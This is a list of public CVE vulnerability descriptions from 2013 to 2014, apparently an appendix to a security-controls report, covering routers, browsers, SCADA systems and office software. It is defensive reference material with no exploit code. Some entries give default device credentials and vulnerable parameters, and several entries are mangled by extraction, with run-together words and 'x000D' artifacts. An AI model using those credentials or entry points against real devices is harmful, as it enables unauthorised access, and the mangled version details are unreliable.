CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JC***A, JC***B, JD***A, JD***B, JE***A, JF***A, JF***B, JF***C, JG***A, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671

CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341

CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)

CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack

CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster - Page 20 of 28

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a //www.google.com/ substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

